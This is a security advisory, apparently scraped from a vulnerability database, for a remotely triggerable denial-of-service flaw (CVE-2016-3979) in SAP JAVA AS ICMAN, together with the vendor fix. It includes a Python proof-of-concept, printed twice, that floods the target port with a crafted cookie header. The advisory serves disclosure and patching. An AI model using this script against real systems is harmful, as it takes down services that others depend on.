ERPScanERPSCAN-16-017SAP JAVA AS icman - DoS vulnerability
0.002 Low
EPSS
Percentile
62.2%
Application: SAP JAVA AS **Versions Affected:**SAP JAVA AS 7.2 – 7.4 Vendor URL: SAP **Bugs:**Denial of Service **Reported:**04.12.2015 **Vendor response:**05.12.2015 **Date of Public Advisory:**14.03.2016 **Reference:**SAP Security Note 2256185 Author: Dmitry Yudin (ERPScan) @ret5et
Vulnerability Information
Class: denial of service
Impact: denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-3979
CVSS Information
CVSS Base Score v3: 7.5/10
CVSS Base Vector:
| AV : Attack Vector (Related exploit range) | Network (N) |
|---|---|
| AC : Attack Complexity (Required attack complexity) | Low (L) |
| PR : Privileges Required (Level of privileges needed to exploit) | None (N) |
| UI : User Interaction (Required user participation) | None (N) |
| S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
| C : Impact to Confidentiality | None (N) |
| I : Impact to Integrity | None (N) |
| A : Impact to Availability | High (H) |
Description
Internet Communication Manager (ICMAN/ICM) in SAP JAVA AS 7.4 allows remote attackers to cause a denial of service (possible heap corruption IctParseCookies()) via a crafted HTTP request
Business risk
A denial of service vulnerability can terminate a process of the vulnerable component. As a result, nobody can use this service, which has a negative influence on business processes. System downtime also harms business reputation.
VULNERABLE PACKAGES
SAP NetWeaver AS JAVA 7.2- 7.4
Other versions are probably affected too, but they were not checked.
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2256185
TECHNICAL DESCRIPTION
Anonymous attacker can use a special HTTP request to cause a denial of service in SAP AS JAVA.
Proof of Concept
#!/usr/bin/env python import socket import argparse data = ‘get / HTTP/1.0\r\nhost:\r\ncookie: ;\x0c%s\r\n\r\n’ % (“\x0c” * 0x1b58) def run(args): addr = (args.ip, args.port) try: s = socket.create_connection(addr,timeout=0.3) while True: s.send(data) except socket.error: pass if name == ‘main’: apars = argparse.ArgumentParser(description=‘icman - 50000 port - DoS’) apars.add_argument(‘–ip’, type=str, help=‘icman ip’, required=True) apars.add_argument(‘–port’, type=int, help=‘icman web port’, required=True, default=50000) args = apars.parse_args() run(args)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
#!/usr/bin/env python
import socket
import argparse
data = ‘get / HTTP/1.0\r\nhost:\r\ncookie: ;\x0c%s\r\n\r\n’ % (“\x0c” * 0x1b58)
def run(args):
addr = (args.ip, args.port)
try:
s = socket.create_connection(addr,timeout=0.3)
while True:
s.send(data)
except socket.error:
pass
if name == ‘main’:
apars = argparse.ArgumentParser(description=‘icman - 50000 port - DoS’)
apars.add_argument(‘–ip’, type=str, help=‘icman ip’, required=True)
apars.add_argument(‘–port’, type=int, help=‘icman web port’, required=True, default=50000)
args = apars.parse_args()
run(args)
—|—
Related
